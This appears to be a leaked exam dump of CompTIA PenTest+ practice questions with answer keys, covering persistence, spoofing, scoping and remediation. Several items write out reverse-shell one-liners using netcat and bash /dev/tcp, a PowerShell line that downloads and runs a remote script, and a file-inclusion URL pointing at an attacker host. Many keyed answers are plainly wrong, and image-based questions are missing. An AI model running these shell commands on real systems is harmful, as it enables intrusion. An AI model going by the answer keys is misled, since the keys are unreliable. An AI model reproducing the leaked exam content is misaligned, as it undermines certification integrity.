PT0-101 NetworkArmy

WWW.NETWORKARMY.
IN
PT0-001
COMPTIA PENTEST+ CERTIFICATION
NetworkArmy is not selling dumps. You can use these dumps for writing exam.
But it should be done in your own risk.
Exam A
QUESTION 1
DRAG DROP
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based
on the character sets represented. Each password may be used only once.
Select and Place:
Correct Answer:
5833E5AE1387343E1F3F43D3D74F0096
Section: (none)
Explanation
Explanation/Reference:
QUESTION 2
DRAG DROP
A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = “Administrator”
The tester suspects it is an issue with string slicing and manipulation. Analyze the following code segment and
drag and drop the correct output for each string manipulation to its corresponding code segment. Options may
be used once or not at all.
Select and Place:
Correct Answer:
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 3
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of
the following would achieve that goal?
A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run

B. net session server | dsquery -user | net use c$
C. powershell && set-executionpolicy unrestricted
D. reg save HKLM\System\CurrentControlSet\Services\Sv.reg
Correct Answer: D
Section: (none)
Explanation
QUESTION 4
A client has scheduled a wireless penetration test. Which of the following describes the scoping target
information MOST likely needed before testing can begin?
A. The physical location and network ESSIDs to be tested

B. The number of wireless devices owned by the client
C. The client's preferred wireless access point vendor
D. The bands and frequencies used by the client's devices
Correct Answer: D
Section: (none)
Explanation
QUESTION 5
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used
in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
A. ICS vendors are slow to implement adequate security controls.

B. ICS staff are not adequately trained to perform basic duties.
C. There is a scarcity of replacement equipment for critical devices.
D. There is a lack of compliance for ICS facilities.
Correct Answer: B
Section: (none)
Explanation
QUESTION 6
A security analyst was provided with a detailed penetration report, which was performed against the
organization's DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0.
Which of the following levels of difficulty would be required to exploit this vulnerability?
5833E5AE1387343E1F3F43D3D74F0096
A. Very difficult; perimeter systems are usually behind a firewall.
B. Somewhat difficult; would require significant processing power to exploit.
C. Trivial; little effort is required to exploit this finding.
D. Impossible; external hosts are hardened to protect against attacks.
Correct Answer: C
Section: (none)
Explanation
Reference: https://nvd.nist.gov/vuln-metrics/cvss
QUESTION 7
A penetration tester has gained access to a marketing employee's device. The penetration tester wants to
ensure that if the access is discovered, control of the device can be regained. Which of the following actions
should the penetration tester use to maintain persistence to the device? (Select TWO.)
A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.

B. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com.
C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.
D. Create a fake service in Windows called RTAudio to execute manually.
E. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.
F. Create a schedule task to call C:\windows\system32\drivers\etc\hosts.
Correct Answer: AC
Section: (none)
Explanation
QUESTION 8
Which of the following tools is used to perform a credential brute force attack?
A. Hydra
B. John the Ripper
C. Hashcat
D. Peach
Correct Answer: A
Section: (none)
Explanation
Reference: https://www.greycampus.com/blog/information-security/brute-force-attacks-prominent-tools-to-
tackle-such-attacks
QUESTION 9
Which of the following situations would cause a penetration tester to communicate with a system owner/client
during the course of a test? (Select TWO.)
A. The tester discovers personally identifiable data on the system.

B. The system shows evidence of prior unauthorized compromise.
C. The system shows a lack of hardening throughout.
5833E5AE1387343E1F3F43D3D74F0096
D. The system becomes unavailable following an attempted exploit.
E. The tester discovers a finding on an out-of-scope system.
Correct Answer: BD
Section: (none)
Explanation
QUESTION 10
A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten
vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate
all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the
client?
A. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize
remediation.
B. Identify the issues that can be remediated most quickly and address them first.
C. Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical
vulnerabilities
D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long
lime.
Correct Answer: D
Section: (none)
Explanation
QUESTION 11
Which of the following is the reason why a penetration tester would run the chkconfig --del
servicename command at the end of an engagement?
A. To remove the persistence

B. To enable persistence
C. To report persistence
D. To check for persistence
Correct Answer: A
Section: (none)
Explanation
QUESTION 12
A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely
command to exploit the NETBIOS name service?
A. arpspoof
B. nmap
C. responder
D. burpsuite
5833E5AE1387343E1F3F43D3D74F0096
Correct Answer: B
Section: (none)
Explanation
Reference: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/
QUESTION 13
A security consultant receives a document outlining the scope of an upcoming penetration test. This document
contains IP addresses and times that each can be scanned. Which of the following would contain this
information?
A. Rules of engagement
B. Request for proposal
C. Master service agreement
D. Business impact analysis
Correct Answer: A
Section: (none)
Explanation
QUESTION 14
A penetration tester executes the following commands:
Which of the following is a local host vulnerability that the attacker is exploiting?
A. Insecure file permissions

B. Application whitelisting
C. Shell escape
D. Writable service
Correct Answer: A
Section: (none)
Explanation
Reference: https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#john-the-ripper---jtr
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 15
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is
MOST critical and should be prioritized for exploitation?
A. Stored XSS
B. Fill path disclosure
C. Expired certificate
D. Clickjacking
Correct Answer: A
Section: (none)
Explanation
Reference: https://www.owasp.org/index.php/Top_10_2010-A2-Cross-Site_Scripting_(XSS)
QUESTION 16
A penetration tester observes that several high-numbered ports are listening on a public web server. However,
the system owner says the application only uses port 443. Which of the following would be BEST to
recommend?
A. Transition the application to another port.

B. Filter port 443 to specific IP addresses.
C. Implement a web application firewall.
D. Disable unneeded services.
Correct Answer: D
Section: (none)
Explanation
QUESTION 17
A penetration tester was able to enter an SQL injection command into a text box and gain access to the
information store on the database. Which of the following is the BEST recommendation that would mitigate the
vulnerability?
A. Randomize the credentials used to log in.

B. Install host-based intrusion detection.
C. Implement input normalization.
D. Perform system hardening.
Correct Answer: D
Section: (none)
Explanation
QUESTION 18
Black box penetration testing strategy provides the tester with:
A. a target list
B. a network diagram
5833E5AE1387343E1F3F43D3D74F0096
C. source code
D. privileged credentials
Correct Answer: D
Section: (none)
Explanation
Reference: https://www.scnsoft.com/blog/fifty-shades-of-penetration-testing
QUESTION 19
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).
A. Shodan
B. SET
C. BeEF
D. Wireshark
E. Maltego
F. Dynamo
Correct Answer: AE
Section: (none)
Explanation
Reference: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/#gref
QUESTION 20
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration
tester spoof to get the MOST information?
A. MAC address of the client

B. MAC address of the domain controller
C. MAC address of the web server
D. MAC address of the gateway
Correct Answer: D
Section: (none)
Explanation
QUESTION 21
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising
a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report?
(Select THREE).
A. Randomize local administrator credentials for each machine.

B. Disable remote logons for local administrators.
C. Require multifactor authentication for all logins.
D. Increase minimum password complexity requirements.
E. Apply additional network access control.
5833E5AE1387343E1F3F43D3D74F0096
F. Enable full-disk encryption on every workstation.
G. Segment each host into its own VLAN.
Correct Answer: CDE

Section: (none)
Explanation
QUESTION 22
A security consultant is trying to attack a device with a previously identified user account.
Which of the following types of attacks is being executed?
A. Credential dump attack

B. DLL injection attack
C. Reverse shell attack
D. Pass the hash attack
Correct Answer: D
Section: (none)
Explanation
QUESTION 23
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given
below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?
A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20

B. arpspoof -t 192.168.1.20 192.168.1.254
C. arpspoof -c both -t 192.168.1.20 192.168.1.253
5833E5AE1387343E1F3F43D3D74F0096
D. arpspoof -r -t 192.168.1.253 192.168.1.20
Correct Answer: B
Section: (none)
Explanation
Reference: https://www.hackers-arise.com/single-post/2017/07/25/Man-the-Middle-MiTM-Attack-with-
ARPspoofing
QUESTION 24
A client has requested an external network penetration test for compliance purposes. During discussion
between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's
source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST
argument as to why the penetration tester's source IP addresses should be whitelisted?
A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring
systems.
B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations;
potentially delaying the time-sensitive test.
C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and
newly discovered weaknesses.
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on
determining the relative effectiveness of active defenses such as an IPS.
Correct Answer: D
Section: (none)
Explanation
QUESTION 25
An energy company contracted a security firm to perform a penetration test of a power plant, which employs
ICS to manage power generation and cooling. Which of the following is a consideration unique to such an
environment that must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools

B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
Correct Answer: A
Section: (none)
Explanation
QUESTION 26
A healthcare organization must abide by local regulations to protect and attest to the protection of personal
health information of covered individuals. Which of the following conditions should a penetration tester
specifically test for when performing an assessment? (Select TWO).
A. Cleartext exposure of SNMP trap data
5833E5AE1387343E1F3F43D3D74F0096
B. Software bugs resident in the IT ticketing system
C. S/MIME certificate templates defined by the CA
D. Health information communicated over HTTP
E. DAR encryption on records servers
Correct Answer: DE
Section: (none)
Explanation
QUESTION 27
Which of the following is an example of a spear phishing attack?
A. Targeting an executive with an SMS attack

B. Targeting a specific team with an email attack
C. Targeting random users with a USB key drop
D. Targeting an organization with a watering hole attack
Correct Answer: A
Section: (none)
Explanation
Reference: https://www.comparitech.com/blog/information-security/spear-phishing/
QUESTION 28
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions
during ingest into a Windows application. Before beginning to test the application, which of the following should
the assessor request from the organization?
A. Sample SOAP messages

B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file
Correct Answer: D
Section: (none)
Explanation
QUESTION 29
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple
buffer overflow?
A. Stack pointer register

B. Index pointer register
C. Stack base pointer
D. Destination index register
Correct Answer: A
5833E5AE1387343E1F3F43D3D74F0096
Section: (none)
Explanation
Reference: http://www.informit.com/articles/article.aspx?p=704311&seqNum=3
QUESTION 30
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed
on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain
a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do
so? (Select TWO).
A. nc 192.168.1.5 44444
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
D. nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
Correct Answer: BC
Section: (none)
Explanation
Reference: https://www.reddit.com/r/hacking/comments/5ms9gv/help_reverse_shell_exploit/
QUESTION 31
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which
of the following BEST describes the reasoning for this?
A. Manufacturers developing IoT devices are less concerned with security.

B. It is difficult for administrators to implement the same security standards across the board.
C. IoT systems often lack the hardware power required by more secure solutions.
D. Regulatory authorities often have lower security requirements for IoT systems.
Correct Answer: A
Section: (none)
Explanation
QUESTION 32
Which of the following commands starts the Metasploit database?
A. msfconsole
B. workspace
C. msfvenom
D. db_init
E. db_connect
Correct Answer: A
Section: (none)
5833E5AE1387343E1F3F43D3D74F0096
Explanation
Reference: https://www.offensive-security.com/metasploit-unleashed/msfconsole/
QUESTION 33
A company requested a penetration tester review the security of an in-house developed Android application.
The penetration tester received an APK file to support the assessment. The penetration tester wants to run
SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select
TWO).
A. Convert to JAR.
B. Decompile.
C. Cross-compile the application.
D. Convert JAR files to DEX.
E. Re-sign the APK.
F. Attach to ADB.
Correct Answer: AB
Section: (none)
Explanation
QUESTION 34
A penetration tester identifies the following findings during an external vulnerability scan:
Which of the following attack strategies should be prioritized from the scan results above?
A. Obsolete software may contain exploitable components.

B. Weak password management practices may be employed.
C. Cryptographically weak protocols may be intercepted.
D. Web server configurations may reveal sensitive information.
Correct Answer: D
Section: (none)
Explanation
QUESTION 35
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In
which of the following areas of the report should the penetration tester put this?
A. Appendices
B. Executive summary
5833E5AE1387343E1F3F43D3D74F0096
C. Technical summary
D. Main body
Correct Answer: B
Section: (none)
Explanation
QUESTION 36
A penetration tester is performing a black box assessment on a web-based banking application. The tester was
only provided with a URL to the login page. Given the below code and output:
Which of the following is the tester intending to do?
A. Horizontally escalate privileges.

B. Scrape the page for hidden fields.
C. Analyze HTTP response code.
D. Search for HTTP headers.
Correct Answer: D
Section: (none)
Explanation
QUESTION 37
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP
10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would
accomplish this task?
A. From the remote computer, run the following commands:

export XHOST 192.168.1.10:0.0
xhost+
Terminal
B. From the local computer, run the following command:
5833E5AE1387343E1F3F43D3D74F0096
ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm
C. From the remote computer, run the following command:
ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 “xhost+; xterm”
D. From the local computer, run the following command:
nc -l -p 6000
Then, from the remote computer, run the following command:
xterm | nc 192.168.1.10 6000
Correct Answer: A
Section: (none)
Explanation
QUESTION 38
A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a
non-privileged user who should have no access to any data. Given the data below from the web interception
proxy:
Which of the following types of vulnerabilities is being exploited?
A. Forced browsing vulnerability

B. Parameter pollution vulnerability
C. File upload vulnerability
D. Cookie enumeration
Correct Answer: D
Section: (none)
Explanation
QUESTION 39
5833E5AE1387343E1F3F43D3D74F0096
A penetration tester compromises a system that has unrestricted network access over port 443 to any host.
The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the
following methods would the penetration tester MOST likely use?
A. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;

B. ssh superadmin@<DESTINATIONIP> -p 443
C. nc -e /bin/sh <SOURCEIP> 443
D. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1
Correct Answer: D
Section: (none)
Explanation
Reference: https://hackernoon.com/reverse-shell-cf154dfee6bd
QUESTION 40
A penetration tester observes that the content security policy header is missing during a web application
penetration test. Which of the following techniques would the penetration tester MOST likely perform?
A. Command injection attack

B. Clickjacking attack
C. Directory traversal attack
D. Remote file inclusion attack
Correct Answer: B
Section: (none)
Explanation
Reference: https://geekflare.com/http-header-implementation/
QUESTION 41
Which of the following are MOST important when planning for an engagement? (Select TWO).
A. Goals/objectives
B. Architectural diagrams
C. Tolerance to impact
D. Storage time for a report
E. Company policies
Correct Answer: AC
Section: (none)
Explanation
QUESTION 42
The following line was found in an exploited machine's history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?
5833E5AE1387343E1F3F43D3D74F0096
A. Performs a port scan.
B. Grabs the web server's banner.
C. Redirects a TTY to a remote system.
D. Removes error logs for the supplied IP.
Correct Answer: C
Section: (none)
Explanation
QUESTION 43
Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical
security assessment an example of?
A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass
Correct Answer: D
Section: (none)
Explanation
Reference: https://www.triaxiomsecurity.com/2018/08/16/physical-penetration-test-examples/
QUESTION 44
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be
the NEXT action?
A. Disable the network port of the affected service.

B. Complete all findings, and then submit them to the client.
C. Promptly alert the client with details of the finding.
D. Take the target offline so it cannot be exploited by an attacker.
Correct Answer: A
Section: (none)
Explanation
QUESTION 45
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next
step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the
following would BEST meet this goal?
A. Perform an HTTP downgrade attack.

B. Harvest the user credentials to decrypt traffic.
C. Perform an MITM attack.
D. Implement a CA attack by impersonating trusted CAs.
5833E5AE1387343E1F3F43D3D74F0096
Correct Answer: A
Section: (none)
Explanation
QUESTION 46
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in
a user's home folder titled ’’changepass.”
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using “strings" to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges
on the machine?
A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a
token-stealing binary titled changepw. Then run changepass.
B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH
environmental variable to the path '/home/user/'. Then run changepass.
C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-
stealing binary titled changepw. Then run changepass.
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental
variable to the path of '/usr/local/bin'.
Correct Answer: D
Section: (none)
Explanation
QUESTION 47
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses.
Which of the following is the MOST efficient to utilize?
A. nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4

B. nslookup -ns 8.8.8.8 << dnslist.txt
C. for x in {1...254}; do dig -x 192.168.$x.$x; done
D. dig -r > echo “8.8.8.8” >> /etc/resolv.conf
Correct Answer: A
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 48
Given the following Python script:
Which of the following is where the output will go?
A. To the screen
B. To a network server
C. To a file
D. To /dev/null
Correct Answer: C
Section: (none)
Explanation
QUESTION 49
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends
from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form
should be sent using an:
A. HTTP POST method.

B. HTTP OPTIONS method.
C. HTTP PUT method.
D. HTTP TRACE method.
Correct Answer: A
Section: (none)
Explanation
QUESTION 50
A software developer wants to test the code of an application for vulnerabilities. Which of the following
processes should the software developer perform?
A. Vulnerability scan
5833E5AE1387343E1F3F43D3D74F0096
B. Dynamic scan
C. Static scan
D. Compliance scan
Correct Answer: A
Section: (none)
Explanation
QUESTION 51
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A. Implement a blacklist.
B. Block URL redirections.
C. Double URL encode the parameters.
D. Stop external calls from the application.
Correct Answer: B
Section: (none)
Explanation
QUESTION 52
A penetration tester is performing a remote scan to determine if the server farm is compliant with the
company's software baseline. Which of the following should the penetration tester perform to verify compliance
with the baseline?
A. Discovery scan
B. Stealth scan
C. Full scan
D. Credentialed scan
Correct Answer: A
Section: (none)
Explanation
QUESTION 53
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT
department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a
dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).
A. Mandate all employees take security awareness training.

B. Implement two-factor authentication for remote access.
C. Install an intrusion prevention system.
5833E5AE1387343E1F3F43D3D74F0096
D. Increase password complexity requirements.
E. Install a security information event monitoring solution.
F. Prevent members of the IT department from interactively logging in as administrators.
G. Upgrade the cipher suite used for the VPN solution.
Correct Answer: BCG

Section: (none)
Explanation
QUESTION 54
A penetration tester is reviewing the following output from a wireless sniffer:
Which of the following can be extrapolated from the above information?
A. Hardware vendor
B. Channel interference
C. Usernames
D. Key strength
Correct Answer: C
Section: (none)
Explanation
QUESTION 55
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer
is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email.
Which of the following types of motivation was used in this attack?
A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof
Correct Answer: B
Section: (none)
Explanation
QUESTION 56
A security assessor completed a comprehensive penetration test of a company and its networks and systems.
During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's
5833E5AE1387343E1F3F43D3D74F0096
intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor,
although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of
impact?
A. Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital
signing.
B. Implement new training to be aware of the risks in accessing the application. This training can be
decommissioned after the vulnerability is patched.
C. Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the
application to company staff after the vulnerability is patched.
D. Require payroll users to change the passwords used to authenticate to the application. Following the
patching of the vulnerability, implement another required password change.
Correct Answer: C
Section: (none)
Explanation
QUESTION 57
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application.
Which of the following would be the BEST remediation strategy?
A. Enable HTTP Strict Transport Security.

B. Enable a secure cookie flag.
C. Encrypt the communication channel.
D. Sanitize invalid user input.
Correct Answer: A
Section: (none)
Explanation
QUESTION 58
A penetration tester is performing a code review. Which of the following testing techniques is being performed?
A. Dynamic analysis
B. Fuzzing analysis
C. Static analysis
D. Run-time analysis
Correct Answer: C
Section: (none)
Explanation
Reference: https://smartbear.com/learn/code-review/what-is-code-review/
QUESTION 59
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by
physically engaging them?
5833E5AE1387343E1F3F43D3D74F0096
A. Locating emergency exits
B. Preparing a pretext
C. Shoulder surfing the victim
D. Tailgating the victim
Correct Answer: B
Section: (none)
Explanation
QUESTION 60
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/

script.ps1”);Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?
A. Set the execution policy.

B. Execute a remote script.
C. Run an encoded command.
D. Instantiate an object.
Correct Answer: B
Section: (none)
Explanation
QUESTION 61
Which of the following excerpts would come from a corporate policy?
A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric.
B. The help desk can be reached at 800-passwd1 to perform password resets.
C. Employees must use strong passwords for accessing corporate assets.
D. The corporate systems must store passwords using the MD5 hashing algorithm.
Correct Answer: D
Section: (none)
Explanation
QUESTION 62
In which of the following scenarios would a tester perform a Kerberoasting attack?
A. The tester has compromised a Windows device and dumps the LSA secrets.
B. The tester needs to retrieve the SAM database and crack the password hashes.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral
movement.
D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the
5833E5AE1387343E1F3F43D3D74F0096
system.
Correct Answer: C
Section: (none)
Explanation
QUESTION 63
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry
keys should the tester use?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
Correct Answer: C
Section: (none)
Explanation
Reference: https://www.redcanary.com/blog/windows-registry-attacks-threat-detection/
QUESTION 64
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not
authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users “DN=company.com; OU=hq CN=users”

B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
Correct Answer: D
Section: (none)
Explanation
QUESTION 65
Which of the following properties of the penetration testing engagement agreement will have the LARGEST
impact on observing and testing production systems at their highest loads?
A. Creating a scope of the critical production systems

B. Setting a schedule of testing access times
C. Establishing a white-box testing engagement
D. Having management sign off on intrusive testing
Correct Answer: B
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 66
HOTSPOT
Instructions:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to
prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
Hot Area:
Correct Answer:
5833E5AE1387343E1F3F43D3D74F0096
Section: (none)
Explanation
QUESTION 67
In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The
laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the
device?
A. Brute force the user’s password.

B. Perform an ARP spoofing attack.
C. Leverage the BeEF framework to capture credentials.
D. Conduct LLMNR/NETBIOS-ns poisoning.
Correct Answer: A
5833E5AE1387343E1F3F43D3D74F0096
Section: (none)
Explanation
QUESTION 68
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in
preparing for this engagement?
A. Nikto
B. WAR
C. W3AF
D. Swagger
Correct Answer: D
Section: (none)
Explanation
Reference: https://blog.securelayer7.net/api-penetration-testing-with-owasp-2017-test-cases/
QUESTION 69
A security guard observes an individual entering the building after scanning a badge. The facility has a strict
badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds
two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely
occurred?
A. The badge was cloned.

B. The physical access control server is malfunctioning.
C. The system reached the crossover error rate.
D. The employee lost the badge.
Correct Answer: A
Section: (none)
Explanation
QUESTION 70
If a security consultant comes across a password hash that resembles the following:
b117525b345470c29ca3d8ae0b556ba8
Which of the following formats is the correct hash type?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
Correct Answer: D
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 71
During an internal network penetration test, a tester recovers the NTLM password hash for a user known to
have full administrator privileges on a number of target systems. Efforts to crack the hash and recover the
plaintext password have been unsuccessful.
Which of the following would be the BEST target for continued exploitation efforts?
A. Operating system: Windows 7

Open ports: 23, 161
B. Operating system: Windows Server 2016
Open ports: 53, 5900
C. Operating system: Windows 8.1
D. Operating system: Windows 8
Correct Answer: C
Section: (none)
Explanation
QUESTION 72
Which of the following would be the BEST for performing passive reconnaissance on a target’s external
domain?
A. Peach
B. CeWL
C. OpenVAS
D. Shodan
Correct Answer: D
Section: (none)
Explanation
Reference: https://www.securitysift.com/passive-reconnaissance/
QUESTION 73
A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates
a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the
previous report. Which of the following is the MOST likely reason for the reduced severity?
A. The client has applied a hot fix without updating the version.
B. The threat landscape has significantly changed.
C. The client has updated their codebase with new features.
D. Thera are currently no known exploits for this vulnerability.
Correct Answer: A
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 74
An attacker uses SET to make a copy of a company’s cloud-hosted web mail portal and sends an email in
hopes the Chief Executive Officer (CEO) logs in to obtain the CEO’s login credentials. Which of the following
types of attacks is this an example of?
A. Elicitation attack
B. Impersonation attack
C. Spear phishing attack
D. Drive-by download attack
Correct Answer: A
Section: (none)
Explanation
Reference: https://www.social-engineer.org/framework/influencing-others/elicitation/
QUESTION 75
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following
Nmap commands should the tester use?
A. nmap -p 22 -iL targets

B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets
Correct Answer: A
Section: (none)
Explanation
QUESTION 76
A penetration tester is required to perform OSINT on staff at a target company after completing the
infrastructure aspect. Which of the following would be the BEST step for penetration?
A. Obtain staff information by calling the company and using social engineering techniques.
B. Visit the client and use impersonation to obtain information from staff.
C. Send spoofed emails to staff to see if staff will respond with sensitive information.
D. Search the internet for information on staff such as social networking sites.
Correct Answer: D
Section: (none)
Explanation
Reference: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it
QUESTION 77
During the information gathering phase of a network penetration test for the corp.local domain, which of the
following commands would provide a list of domain controllers?
5833E5AE1387343E1F3F43D3D74F0096
A. nslookup –type=srv _ldap._tcp.dc._msdcs.corp.local
B. nmap –sV –p 389 - -script=ldap-rootdse corp.local
C. net group “Domain Controllers” /domain
D. gpresult /d corp.local /r “Domain Controllers”
Correct Answer: A
Section: (none)
Explanation
QUESTION 78
A penetration tester has been assigned to perform an external penetration assessment of a company. Which of
the following steps would BEST help with the passive-information-gathering process? (Choose two.)
A. Wait outside of the company’s building and attempt to tailgate behind an employee.
B. Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and
attempt to gain access.
C. Use domain and IP registry websites to identify the company’s external netblocks and external facing
applications.
D. Search social media for information technology employees who post information about the technologies
they work with.
E. Identify the company’s external facing webmail application, enumerate user accounts and attempt password
guessing to gain access.
Correct Answer: DE
Section: (none)
Explanation
QUESTION 79
A client has voiced concern about the number of companies being breached by remote attackers, who are
looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify?
A. Script kiddies
B. APT actors
C. Insider threats
D. Hacktivist groups
Correct Answer: B
Section: (none)
Explanation
Reference: https://en.wikipedia.org/wiki/Advanced_persistent_threat
QUESTION 80
A company contracted a firm specializing in penetration testing to assess the security of a core business
application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must
the firm take before it can run a static code analyzer?
A. Run the application through a dynamic code analyzer.
5833E5AE1387343E1F3F43D3D74F0096
B. Employ a fuzzing utility.
